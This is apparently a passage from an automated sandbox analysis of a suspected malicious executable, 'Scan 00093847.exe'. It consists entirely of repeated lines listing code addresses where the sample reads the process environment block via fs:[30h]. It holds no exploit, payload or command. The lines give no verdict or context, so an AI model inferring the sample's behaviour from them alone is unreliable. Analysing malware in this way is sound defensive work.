            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]3_2_01084260
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]3_2_01084260
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107826B mov eax, dword ptr fs:[00000030h]3_2_0107826B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C1270 mov eax, dword ptr fs:[00000030h]3_2_010C1270
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C1270 mov eax, dword ptr fs:[00000030h]3_2_010C1270
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A9274 mov eax, dword ptr fs:[00000030h]3_2_010A9274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114D26B mov eax, dword ptr fs:[00000030h]3_2_0114D26B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114D26B mov eax, dword ptr fs:[00000030h]3_2_0114D26B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE284 mov eax, dword ptr fs:[00000030h]3_2_010BE284
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE284 mov eax, dword ptr fs:[00000030h]3_2_010BE284
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]3_2_01100283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]3_2_01100283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]3_2_01100283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B329E mov eax, dword ptr fs:[00000030h]3_2_010B329E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B329E mov eax, dword ptr fs:[00000030h]3_2_010B329E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155283 mov eax, dword ptr fs:[00000030h]3_2_01155283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902A0 mov eax, dword ptr fs:[00000030h]3_2_010902A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902A0 mov eax, dword ptr fs:[00000030h]3_2_010902A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov eax, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov eax, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov ecx, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov ecx, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011172A0 mov eax, dword ptr fs:[00000030h]3_2_011172A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011172A0 mov eax, dword ptr fs:[00000030h]3_2_011172A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov ecx, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010892C5 mov eax, dword ptr fs:[00000030h]3_2_010892C5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010892C5 mov eax, dword ptr fs:[00000030h]3_2_010892C5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B2D3 mov eax, dword ptr fs:[00000030h]3_2_0107B2D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B2D3 mov eax, dword ptr fs:[00000030h]3_2_0107B2D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B2D3 mov eax, dword ptr fs:[00000030h]3_2_0107B2D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF2D0 mov eax, dword ptr fs:[00000030h]3_2_010AF2D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF2D0 mov eax, dword ptr fs:[00000030h]3_2_010AF2D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]3_2_010902E1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]3_2_010902E1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]3_2_010902E1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F2F8 mov eax, dword ptr fs:[00000030h]3_2_0113F2F8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011552E2 mov eax, dword ptr fs:[00000030h]3_2_011552E2
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010792FF mov eax, dword ptr fs:[00000030h]3_2_010792FF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011312ED mov eax, dword ptr fs:[00000030h]3_2_011312ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B7505 mov eax, dword ptr fs:[00000030h]3_2_010B7505
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B7505 mov ecx, dword ptr fs:[00000030h]3_2_010B7505
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]3_2_01154500
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155537 mov eax, dword ptr fs:[00000030h]3_2_01155537
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]3_2_010AE53E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]3_2_010AE53E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]3_2_010AE53E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]3_2_010AE53E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]3_2_010AE53E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112F525 mov eax, dword ptr fs:[00000030h]3_2_0112F525
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BD530 mov eax, dword ptr fs:[00000030h]3_2_010BD530
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BD530 mov eax, dword ptr fs:[00000030h]3_2_010BD530
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]3_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]3_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]3_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]3_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]3_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]3_2_01090535
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B52F mov eax, dword ptr fs:[00000030h]3_2_0113B52F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108D534 mov eax, dword ptr fs:[00000030h]3_2_0108D534
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108D534 mov eax, dword ptr fs:[00000030h]3_2_0108D534
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108D534 mov eax, dword ptr fs:[00000030h]3_2_0108D534
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108D534 mov eax, dword ptr fs:[00000030h]3_2_0108D534
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108D534 mov eax, dword ptr fs:[00000030h]3_2_0108D534
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108D534 mov eax, dword ptr fs:[00000030h]3_2_0108D534
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01088550 mov eax, dword ptr fs:[00000030h]3_2_01088550
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01088550 mov eax, dword ptr fs:[00000030h]3_2_01088550
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B656A mov eax, dword ptr fs:[00000030h]3_2_010B656A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B656A mov eax, dword ptr fs:[00000030h]3_2_010B656A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B656A mov eax, dword ptr fs:[00000030h]3_2_010B656A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B562 mov eax, dword ptr fs:[00000030h]3_2_0107B562
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BB570 mov eax, dword ptr fs:[00000030h]3_2_010BB570
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BB570 mov eax, dword ptr fs:[00000030h]3_2_010BB570
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B4588 mov eax, dword ptr fs:[00000030h]3_2_010B4588
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110B594 mov eax, dword ptr fs:[00000030h]3_2_0110B594
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110B594 mov eax, dword ptr fs:[00000030h]3_2_0110B594
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107758F mov eax, dword ptr fs:[00000030h]3_2_0107758F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107758F mov eax, dword ptr fs:[00000030h]3_2_0107758F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107758F mov eax, dword ptr fs:[00000030h]3_2_0107758F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01082582 mov eax, dword ptr fs:[00000030h]3_2_01082582
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01082582 mov ecx, dword ptr fs:[00000030h]3_2_01082582
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE59C mov eax, dword ptr fs:[00000030h]3_2_010BE59C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15A9 mov eax, dword ptr fs:[00000030h]3_2_010A15A9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15A9 mov eax, dword ptr fs:[00000030h]3_2_010A15A9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15A9 mov eax, dword ptr fs:[00000030h]3_2_010A15A9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15A9 mov eax, dword ptr fs:[00000030h]3_2_010A15A9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15A9 mov eax, dword ptr fs:[00000030h]3_2_010A15A9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011135BA mov eax, dword ptr fs:[00000030h]3_2_011135BA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011135BA mov eax, dword ptr fs:[00000030h]3_2_011135BA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011135BA mov eax, dword ptr fs:[00000030h]3_2_011135BA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011135BA mov eax, dword ptr fs:[00000030h]3_2_011135BA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F5BE mov eax, dword ptr fs:[00000030h]3_2_0113F5BE
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011005A7 mov eax, dword ptr fs:[00000030h]3_2_011005A7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011005A7 mov eax, dword ptr fs:[00000030h]3_2_011005A7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011005A7 mov eax, dword ptr fs:[00000030h]3_2_011005A7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF5B0 mov eax, dword ptr fs:[00000030h]3_2_010AF5B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A45B1 mov eax, dword ptr fs:[00000030h]3_2_010A45B1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A45B1 mov eax, dword ptr fs:[00000030h]3_2_010A45B1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011535D7 mov eax, dword ptr fs:[00000030h]3_2_011535D7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011535D7 mov eax, dword ptr fs:[00000030h]3_2_011535D7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011535D7 mov eax, dword ptr fs:[00000030h]3_2_011535D7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE5CF mov eax, dword ptr fs:[00000030h]3_2_010BE5CF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE5CF mov eax, dword ptr fs:[00000030h]3_2_010BE5CF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B55C0 mov eax, dword ptr fs:[00000030h]3_2_010B55C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A95DA mov eax, dword ptr fs:[00000030h]3_2_010A95DA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010865D0 mov eax, dword ptr fs:[00000030h]3_2_010865D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA5D0 mov eax, dword ptr fs:[00000030h]3_2_010BA5D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BA5D0 mov eax, dword ptr fs:[00000030h]3_2_010BA5D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011555C9 mov eax, dword ptr fs:[00000030h]3_2_011555C9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD5D0 mov eax, dword ptr fs:[00000030h]3_2_010FD5D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010FD5D0 mov ecx, dword ptr fs:[00000030h]3_2_010FD5D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BC5ED mov eax, dword ptr fs:[00000030h]3_2_010BC5ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BC5ED mov eax, dword ptr fs:[00000030h]3_2_010BC5ED
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010825E0 mov eax, dword ptr fs:[00000030h]3_2_010825E0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]3_2_010AE5E7
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15F4 mov eax, dword ptr fs:[00000030h]3_2_010A15F4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15F4 mov eax, dword ptr fs:[00000030h]3_2_010A15F4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15F4 mov eax, dword ptr fs:[00000030h]3_2_010A15F4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15F4 mov eax, dword ptr fs:[00000030h]3_2_010A15F4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15F4 mov eax, dword ptr fs:[00000030h]3_2_010A15F4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A15F4 mov eax, dword ptr fs:[00000030h]3_2_010A15F4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A340D mov eax, dword ptr fs:[00000030h]3_2_010A340D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B8402 mov eax, dword ptr fs:[00000030h]3_2_010B8402
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B8402 mov eax, dword ptr fs:[00000030h]3_2_010B8402
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B8402 mov eax, dword ptr fs:[00000030h]3_2_010B8402
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107C427 mov eax, dword ptr fs:[00000030h]3_2_0107C427
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E420 mov eax, dword ptr fs:[00000030h]3_2_0107E420
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E420 mov eax, dword ptr fs:[00000030h]3_2_0107E420
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E420 mov eax, dword ptr fs:[00000030h]3_2_0107E420
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F453 mov eax, dword ptr fs:[00000030h]3_2_0113F453
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108B440 mov eax, dword ptr fs:[00000030h]3_2_0108B440
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108B440 mov eax, dword ptr fs:[00000030h]3_2_0108B440
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108B440 mov eax, dword ptr fs:[00000030h]3_2_0108B440
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108B440 mov eax, dword ptr fs:[00000030h]3_2_0108B440
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108B440 mov eax, dword ptr fs:[00000030h]3_2_0108B440
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108B440 mov eax, dword ptr fs:[00000030h]3_2_0108B440
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]3_2_010BE443
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A245A mov eax, dword ptr fs:[00000030h]3_2_010A245A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107645D mov eax, dword ptr fs:[00000030h]3_2_0107645D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081460 mov eax, dword ptr fs:[00000030h]3_2_01081460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081460 mov eax, dword ptr fs:[00000030h]3_2_01081460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081460 mov eax, dword ptr fs:[00000030h]3_2_01081460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081460 mov eax, dword ptr fs:[00000030h]3_2_01081460
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01081460 mov eax, dword ptr fs:[00000030h]3_2_01081460
